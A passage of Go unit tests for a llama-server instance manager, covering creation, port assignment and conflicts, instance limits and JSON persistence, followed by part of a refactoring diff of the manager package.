t.Fatalf("First CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create duplicate
|
||||
_, err = manager.CreateInstance("test-instance", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for duplicate instance name")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "already exists") {
|
||||
t.Errorf("Expected duplicate name error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
|
||||
// Create manager with low max instances limit
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
MaxInstances: 2, // Very low limit for testing
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances up to the limit
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to max instances limit
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when exceeding max instances limit")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
|
||||
t.Errorf("Expected max instances error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create instance without specifying port
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
inst, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should auto-assign a port in the range
|
||||
port := inst.GetOptions().Port
|
||||
if port < 8000 || port > 9000 {
|
||||
t.Errorf("Expected port in range 8000-9000, got %d", port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortConflictDetection(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080, // Explicit port
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
Port: 8080, // Same port - should conflict
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create second instance with same port
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for port conflict")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
|
||||
t.Errorf("Expected port conflict error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create multiple instances and verify they get different ports
|
||||
instance1, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
instance2, err := manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
port1 := instance1.GetOptions().Port
|
||||
port2 := instance2.GetOptions().Port
|
||||
|
||||
if port1 == port2 {
|
||||
t.Errorf("Expected different ports, both got %d", port1)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortExhaustion(t *testing.T) {
|
||||
// Create manager with very small port range
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 8001}, // Only 2 ports available
|
||||
MaxInstances: 10, // Higher than available ports
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances to exhaust all ports
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to port exhaustion
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when ports are exhausted")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
|
||||
t.Errorf("Expected port exhaustion error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_PortRelease(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
// Create instance with specific port
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete the instance
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should be able to create new instance with same port
|
||||
_, err = manager.CreateInstance("new-instance", options)
|
||||
if err != nil {
|
||||
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance first
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
created, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Retrieve it
|
||||
retrieved, err := manager.GetInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("GetInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if retrieved.Name != created.Name {
|
||||
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
_, err := manager.GetInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestListInstances(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Initially empty
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected 0 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Create some instances
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// List should return both
|
||||
instances, err = manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 2 {
|
||||
t.Errorf("Expected 2 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Check names are present
|
||||
names := make(map[string]bool)
|
||||
for _, inst := range instances {
|
||||
names[inst.Name] = true
|
||||
}
|
||||
if !names["instance1"] || !names["instance2"] {
|
||||
t.Error("Expected both instance1 and instance2 in list")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete it
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should no longer exist
|
||||
_, err = manager.GetInstance("test-instance")
|
||||
if err == nil {
|
||||
t.Error("Instance should not exist after deletion")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
err := manager.DeleteInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for deleting nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Update it
|
||||
newOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
updated, err := manager.UpdateInstance("test-instance", newOptions)
|
||||
if err != nil {
|
||||
t.Fatalf("UpdateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
|
||||
}
|
||||
if updated.GetOptions().Port != 8081 {
|
||||
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err := manager.UpdateInstance("nonexistent", options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for updating nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
|
||||
// Create temporary directory for persistence
|
||||
tempDir := t.TempDir()
|
||||
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
// Create instance
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Check that JSON file was created
|
||||
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
|
||||
t.Errorf("Expected persistence file %s to exist", expectedPath)
|
||||
}
|
||||
|
||||
// Verify file contains correct data
|
||||
data, err := os.ReadFile(expectedPath)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to read persistence file: %v", err)
|
||||
}
|
||||
|
||||
var persistedInstance map[string]interface{}
|
||||
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||
t.Fatalf("Failed to unmarshal persisted data: %v", err)
|
||||
}
|
||||
|
||||
if persistedInstance["name"] != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %v", persistedInstance["name"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstancePersistedOnUpdate(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
// Create instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Update instance
|
||||
newOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
_, err = manager.UpdateInstance("test-instance", newOptions)
|
||||
if err != nil {
|
||||
t.Fatalf("UpdateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Verify persistence file was updated
|
||||
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||
data, err := os.ReadFile(expectedPath)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to read persistence file: %v", err)
|
||||
}
|
||||
|
||||
var persistedInstance map[string]interface{}
|
||||
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||
t.Fatalf("Failed to unmarshal persisted data: %v", err)
|
||||
}
|
||||
|
||||
// Check that the options were updated
|
||||
options_data, ok := persistedInstance["options"].(map[string]interface{})
|
||||
if !ok {
|
||||
t.Fatal("Expected options to be present in persisted data")
|
||||
}
|
||||
|
||||
if options_data["model"] != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %v", options_data["model"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstanceFileDeletedOnDeletion(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
// Create instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||
|
||||
// Verify file exists
|
||||
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
|
||||
t.Fatal("Expected persistence file to exist before deletion")
|
||||
}
|
||||
|
||||
// Delete instance
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Verify file was deleted
|
||||
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
|
||||
t.Error("Expected persistence file to be deleted")
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstancesLoadedFromDisk(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
// Create JSON files manually (simulating previous run)
|
||||
instance1JSON := `{
|
||||
"name": "instance1",
|
||||
"running": false,
|
||||
"options": {
|
||||
"model": "/path/to/model1.gguf",
|
||||
"port": 8080
|
||||
}
|
||||
}`
|
||||
|
||||
instance2JSON := `{
|
||||
"name": "instance2",
|
||||
"running": false,
|
||||
"options": {
|
||||
"model": "/path/to/model2.gguf",
|
||||
"port": 8081
|
||||
}
|
||||
}`
|
||||
|
||||
// Write JSON files
|
||||
err := os.WriteFile(filepath.Join(tempDir, "instance1.json"), []byte(instance1JSON), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||
}
|
||||
|
||||
err = os.WriteFile(filepath.Join(tempDir, "instance2.json"), []byte(instance2JSON), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||
}
|
||||
|
||||
// Create manager - should load instances from disk
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
// Verify instances were loaded
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
|
||||
if len(instances) != 2 {
|
||||
t.Fatalf("Expected 2 loaded instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Check instances by name
|
||||
instancesByName := make(map[string]*instance.Process)
|
||||
for _, inst := range instances {
|
||||
instancesByName[inst.Name] = inst
|
||||
}
|
||||
|
||||
instance1, exists := instancesByName["instance1"]
|
||||
if !exists {
|
||||
t.Error("Expected instance1 to be loaded")
|
||||
} else {
|
||||
if instance1.GetOptions().Model != "/path/to/model1.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model1.gguf', got %q", instance1.GetOptions().Model)
|
||||
}
|
||||
if instance1.GetOptions().Port != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", instance1.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
instance2, exists := instancesByName["instance2"]
|
||||
if !exists {
|
||||
t.Error("Expected instance2 to be loaded")
|
||||
} else {
|
||||
if instance2.GetOptions().Model != "/path/to/model2.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model2.gguf', got %q", instance2.GetOptions().Model)
|
||||
}
|
||||
if instance2.GetOptions().Port != 8081 {
|
||||
t.Errorf("Expected port 8081, got %d", instance2.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_PortMapPopulatedFromLoadedInstances(t *testing.T) {
    tempDir := t.TempDir()

    // Create JSON file with specific port
    instanceJSON := `{
        "name": "test-instance",
        "running": false,
        "options": {
            "model": "/path/to/model.gguf",
            "port": 8080
        }
    }`

    err := os.WriteFile(filepath.Join(tempDir, "test-instance.json"), []byte(instanceJSON), 0644)
    if err != nil {
        t.Fatalf("Failed to write test JSON file: %v", err)
    }

    // Create manager - should load instance and register port
    cfg := config.InstancesConfig{
        PortRange:    [2]int{8000, 9000},
        InstancesDir: tempDir,
        MaxInstances: 10,
    }
    manager := manager.NewInstanceManager(cfg)

    // Try to create new instance with same port - should fail due to conflict
    options := &instance.CreateInstanceOptions{
        LlamaServerOptions: llamacpp.LlamaServerOptions{
            Model: "/path/to/model2.gguf",
            Port:  8080, // Same port as loaded instance
        },
    }

    _, err = manager.CreateInstance("new-instance", options)
    if err == nil {
        t.Fatal("Expected error for port conflict with loaded instance")
    }
    if !strings.Contains(err.Error(), "port") || !strings.Contains(err.Error(), "in use") {
        t.Errorf("Expected port conflict error, got: %v", err)
    }
}
func TestPersistence_CompleteInstanceDataRoundTrip(t *testing.T) {
    tempDir := t.TempDir()

    cfg := config.InstancesConfig{
        PortRange:           [2]int{8000, 9000},
        InstancesDir:        tempDir,
        MaxInstances:        10,
        DefaultAutoRestart:  true,
        DefaultMaxRestarts:  3,
        DefaultRestartDelay: 5,
    }

    // Create first manager and instance with comprehensive options
    manager1 := manager.NewInstanceManager(cfg)

    autoRestart := false
    maxRestarts := 10
    restartDelay := 30

    originalOptions := &instance.CreateInstanceOptions{
        AutoRestart:  &autoRestart,
        MaxRestarts:  &maxRestarts,
        RestartDelay: &restartDelay,
        LlamaServerOptions: llamacpp.LlamaServerOptions{
            Model:       "/path/to/model.gguf",
            Port:        8080,
            Host:        "localhost",
            CtxSize:     4096,
            GPULayers:   32,
            Temperature: 0.7,
            TopK:        40,
            TopP:        0.9,
            Verbose:     true,
            FlashAttn:   false,
            Lora:        []string{"adapter1.bin", "adapter2.bin"},
            HFRepo:      "microsoft/DialoGPT-medium",
        },
    }

    originalInstance, err := manager1.CreateInstance("roundtrip-test", originalOptions)
    if err != nil {
        t.Fatalf("CreateInstance failed: %v", err)
    }

    // Create second manager (simulating restart) - should load the instance
    manager2 := manager.NewInstanceManager(cfg)

    loadedInstance, err := manager2.GetInstance("roundtrip-test")
    if err != nil {
        t.Fatalf("GetInstance failed after reload: %v", err)
    }

    // Compare all data
    if loadedInstance.Name != originalInstance.Name {
        t.Errorf("Name mismatch: original=%q, loaded=%q", originalInstance.Name, loadedInstance.Name)
    }

    originalOpts := originalInstance.GetOptions()
    loadedOpts := loadedInstance.GetOptions()

    // Compare restart options
    if *loadedOpts.AutoRestart != *originalOpts.AutoRestart {
        t.Errorf("AutoRestart mismatch: original=%v, loaded=%v", *originalOpts.AutoRestart, *loadedOpts.AutoRestart)
    }
    if *loadedOpts.MaxRestarts != *originalOpts.MaxRestarts {
        t.Errorf("MaxRestarts mismatch: original=%v, loaded=%v", *originalOpts.MaxRestarts, *loadedOpts.MaxRestarts)
    }
    if *loadedOpts.RestartDelay != *originalOpts.RestartDelay {
        t.Errorf("RestartDelay mismatch: original=%v, loaded=%v", *originalOpts.RestartDelay, *loadedOpts.RestartDelay)
    }

    // Compare llama server options
    if loadedOpts.Model != originalOpts.Model {
        t.Errorf("Model mismatch: original=%q, loaded=%q", originalOpts.Model, loadedOpts.Model)
    }
    if loadedOpts.Port != originalOpts.Port {
        t.Errorf("Port mismatch: original=%d, loaded=%d", originalOpts.Port, loadedOpts.Port)
    }
    if loadedOpts.Host != originalOpts.Host {
        t.Errorf("Host mismatch: original=%q, loaded=%q", originalOpts.Host, loadedOpts.Host)
    }
    if loadedOpts.CtxSize != originalOpts.CtxSize {
        t.Errorf("CtxSize mismatch: original=%d, loaded=%d", originalOpts.CtxSize, loadedOpts.CtxSize)
    }
    if loadedOpts.GPULayers != originalOpts.GPULayers {
        t.Errorf("GPULayers mismatch: original=%d, loaded=%d", originalOpts.GPULayers, loadedOpts.GPULayers)
    }
    if loadedOpts.Temperature != originalOpts.Temperature {
        t.Errorf("Temperature mismatch: original=%f, loaded=%f", originalOpts.Temperature, loadedOpts.Temperature)
    }
    if loadedOpts.TopK != originalOpts.TopK {
        t.Errorf("TopK mismatch: original=%d, loaded=%d", originalOpts.TopK, loadedOpts.TopK)
    }
    if loadedOpts.TopP != originalOpts.TopP {
        t.Errorf("TopP mismatch: original=%f, loaded=%f", originalOpts.TopP, loadedOpts.TopP)
    }
    if loadedOpts.Verbose != originalOpts.Verbose {
        t.Errorf("Verbose mismatch: original=%v, loaded=%v", originalOpts.Verbose, loadedOpts.Verbose)
    }
    if loadedOpts.FlashAttn != originalOpts.FlashAttn {
        t.Errorf("FlashAttn mismatch: original=%v, loaded=%v", originalOpts.FlashAttn, loadedOpts.FlashAttn)
    }
    if loadedOpts.HFRepo != originalOpts.HFRepo {
        t.Errorf("HFRepo mismatch: original=%q, loaded=%q", originalOpts.HFRepo, loadedOpts.HFRepo)
    }

    // Compare slice fields
    if !reflect.DeepEqual(loadedOpts.Lora, originalOpts.Lora) {
        t.Errorf("Lora mismatch: original=%v, loaded=%v", originalOpts.Lora, loadedOpts.Lora)
    }

    // Verify created timestamp is preserved
    if loadedInstance.Created != originalInstance.Created {
        t.Errorf("Created timestamp mismatch: original=%d, loaded=%d", originalInstance.Created, loadedInstance.Created)
    }
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
    cfg := config.InstancesConfig{
        PortRange:           [2]int{8000, 9000},
        LogsDir:             "/tmp/test",
        MaxInstances:        10,
        LlamaExecutable:     "llama-server",
        DefaultAutoRestart:  true,
        DefaultMaxRestarts:  3,
        DefaultRestartDelay: 5,
    }
    return manager.NewInstanceManager(cfg)
}
@@ -1,54 +1,28 @@
package llamactl
package manager

import (
    "fmt"
    "sync"
    "llamactl/pkg/instance"
    "llamactl/pkg/validation"
    "os"
    "path/filepath"
)

// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
    ListInstances() ([]*Instance, error)
    CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
    GetInstance(name string) (*Instance, error)
    UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
    DeleteInstance(name string) error
    StartInstance(name string) (*Instance, error)
    StopInstance(name string) (*Instance, error)
    RestartInstance(name string) (*Instance, error)
    GetInstanceLogs(name string) (string, error)
}

type instanceManager struct {
    mu              sync.RWMutex
    instances       map[string]*Instance
    ports           map[int]bool
    instancesConfig InstancesConfig
}

// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
    return &instanceManager{
        instances:       make(map[string]*Instance),
        ports:           make(map[int]bool),
        instancesConfig: instancesConfig,
    }
}
|
||||
|
||||
// ListInstances returns a list of all instances managed by the instance manager.
|
||||
func (im *instanceManager) ListInstances() ([]*Instance, error) {
|
||||
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
defer im.mu.RUnlock()
|
||||
|
||||
instances := make([]*Instance, 0, len(im.instances))
|
||||
for _, instance := range im.instances {
|
||||
instances = append(instances, instance)
|
||||
instances := make([]*instance.Process, 0, len(im.instances))
|
||||
for _, inst := range im.instances {
|
||||
instances = append(instances, inst)
|
||||
}
|
||||
return instances, nil
|
||||
}
|
||||
|
||||
// CreateInstance creates a new instance with the given options and returns it.
|
||||
// The instance is initially in a "stopped" state.
|
||||
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
|
||||
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
|
||||
if options == nil {
|
||||
return nil, fmt.Errorf("instance options cannot be nil")
|
||||
}
|
||||
@@ -57,12 +31,12 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
|
||||
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
|
||||
}
|
||||
|
||||
err := ValidateInstanceName(name)
|
||||
name, err := validation.ValidateInstanceName(name)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
err = ValidateInstanceOptions(options)
|
||||
err = validation.ValidateInstanceOptions(options)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -90,15 +64,19 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
|
||||
im.ports[options.Port] = true
|
||||
}
|
||||
|
||||
instance := NewInstance(name, &im.instancesConfig, options)
|
||||
im.instances[instance.Name] = instance
|
||||
inst := instance.NewInstance(name, &im.instancesConfig, options)
|
||||
im.instances[inst.Name] = inst
|
||||
im.ports[options.Port] = true
|
||||
|
||||
return instance, nil
|
||||
if err := im.persistInstance(inst); err != nil {
|
||||
